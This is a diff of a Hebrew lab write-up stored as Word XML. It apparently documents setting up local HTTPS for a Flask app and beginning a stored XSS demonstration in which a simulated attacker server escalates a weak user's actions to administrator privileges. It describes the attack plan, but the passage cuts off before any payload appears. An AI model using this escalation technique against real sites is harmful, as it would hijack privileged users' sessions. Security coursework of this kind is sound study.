--- a/q1.docx
+++ b/q1.docx
@@ -4,38 +4,130 @@
   <w:body>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
         <w:rPr>
           <w:rFonts w:cs="Arial"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">סעיף </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>א</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>' – ניצול חולשת</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> XSS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>לצורך ביצוע פעולה בהרשאות</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Administrator</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:cs="Arial"/>
-          <w:rtl/>
-        </w:rPr>
-        <w:t xml:space="preserve">יצרתי </w:t>
-      </w:r>
-      <w:r>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>יצרנו</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Root CA</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:rtl/>
         </w:rPr>
         <w:t xml:space="preserve"> באמצעות </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>OpenSSL</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:rtl/>
         </w:rPr>
         <w:t>.</w:t>
@@ -72,7 +164,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5">
+                    <a:blip r:embed="rId6">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -111,12 +203,27 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>יצרנו</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:cs="Arial"/>
-          <w:rtl/>
-        </w:rPr>
-        <w:t xml:space="preserve">יצרתי מפתח ותעודה עבור </w:t>
-      </w:r>
-      <w:r>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מפתח ותעודה עבור </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>localhost</w:t>
       </w:r>
       <w:r>
@@ -156,7 +263,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6">
+                    <a:blip r:embed="rId7">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -195,10 +302,30 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>חתמנו</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:cs="Arial"/>
           <w:rtl/>
         </w:rPr>
-        <w:t>חתמת</w:t>
+        <w:t xml:space="preserve"> את תעודת האתר באמצעות ה־</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Arial"/>
+        </w:rPr>
+        <w:t>Root CA</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -207,7 +334,7 @@
           <w:rtl/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CDE3062">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B10D1C5" wp14:editId="1F4C2F56">
             <wp:extent cx="5829300" cy="323215"/>
             <wp:effectExtent l="0" t="0" r="0" b="635"/>
             <wp:docPr id="4" name="תמונה 4"/>
@@ -224,7 +351,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7">
+                    <a:blip r:embed="rId8">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -252,23 +379,6 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Arial"/>
-          <w:rtl/>
-        </w:rPr>
-        <w:t>י את תעודת האתר באמצעות ה־</w:t>
-      </w:r>
-      <w:r>
-        <w:t>Root CA</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Arial"/>
-          <w:rtl/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -288,29 +398,59 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>י</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>יבאנו</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:cs="Arial"/>
-          <w:rtl/>
-        </w:rPr>
-        <w:t xml:space="preserve">ייבאתי את </w:t>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> את </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>rootCA.pem</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:rtl/>
         </w:rPr>
         <w:t xml:space="preserve"> למאגר התעודות המהימנות של </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Windows/Chrome</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:rtl/>
         </w:rPr>
         <w:t>.</w:t>
@@ -320,7 +460,6 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:rPr>
-          <w:rFonts w:hint="cs"/>
           <w:rtl/>
         </w:rPr>
       </w:pPr>
@@ -338,8 +477,8 @@
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C142A42">
-            <wp:extent cx="4323978" cy="5327210"/>
-            <wp:effectExtent l="0" t="0" r="635" b="6985"/>
+            <wp:extent cx="4584620" cy="5648325"/>
+            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
             <wp:docPr id="5" name="תמונה 5"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -354,7 +493,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8">
+                    <a:blip r:embed="rId9">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -369,7 +508,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4360539" cy="5372254"/>
+                      <a:ext cx="4642561" cy="5719709"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -386,6 +525,54 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="3"/>
@@ -393,17 +580,34 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cs="Arial" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>הגדרנו</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:cs="Arial"/>
-          <w:rtl/>
-        </w:rPr>
-        <w:t xml:space="preserve">הגדרתי את </w:t>
-      </w:r>
-      <w:r>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> את </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Flask</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:rtl/>
         </w:rPr>
         <w:t xml:space="preserve"> לרוץ עם:</w:t>
@@ -411,6 +615,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:rtl/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -420,13 +626,12 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cs="Arial"/>
-          <w:rtl/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:noProof/>
+          <w:rtl/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="058CE5C0" wp14:editId="7319FBED">
             <wp:extent cx="5020376" cy="1371791"/>
@@ -443,7 +648,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId10"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -464,7 +669,6 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:bookmarkEnd w:id="0"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
@@ -475,24 +679,43 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="1226"/>
         </w:tabs>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="cs"/>
-          <w:rtl/>
-        </w:rPr>
-        <w:t xml:space="preserve">גלשתי ל: </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId10" w:history="1">
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>גלשנו</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="28"/>
+            <w:szCs w:val="28"/>
           </w:rPr>
           <w:t>https://localhost:8443</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
         <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:lang w:val="en-IL"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -500,6 +723,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:rtl/>
           <w:lang w:val="en-IL"/>
         </w:rPr>
@@ -513,7 +738,7 @@
           <w:tab w:val="left" w:pos="1226"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:hint="cs"/>
+          <w:rtl/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -523,8 +748,8 @@
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="6300964" cy="1600200"/>
-            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
+            <wp:extent cx="6042641" cy="1952625"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="6" name="תמונה 6"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -537,7 +762,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId11">
+                    <a:blip r:embed="rId12">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -550,7 +775,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="6351798" cy="1613110"/>
+                      <a:ext cx="6152350" cy="1988077"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -570,14 +795,22 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi w:val="0"/>
+        <w:rPr>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="cs"/>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="6287380" cy="1838325"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FD24D4B" wp14:editId="11EBE6A7">
+            <wp:extent cx="7494277" cy="2200275"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="7" name="תמונה 7"/>
             <wp:cNvGraphicFramePr>
@@ -591,7 +824,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId12">
+                    <a:blip r:embed="rId13">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -604,7 +837,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="6292314" cy="1839768"/>
+                      <a:ext cx="7581868" cy="2225991"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -624,6 +857,1612 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>סעיף ב׳</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> חולשת </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="cs"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>לצורך הדגמת חולשת ה־</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Stored XSS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>כתבנו</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שרת</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Python </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>מקומי המדמה שרת תוקף. מטרת השרת היא לבצע אוטומציה לתהליך ההתקפה ולהראות כיצד משתמש חלש יכול לגרום לביצוע פעולה בהרשאות משתמש חזק</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>תחילה</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>בדקנו</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> האם שדה ההודעות מוצג כטקסט רגיל או כ־</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">. לצורך כך </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>הזנו</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> הודעה המכילה תגית </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> פשוטה:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
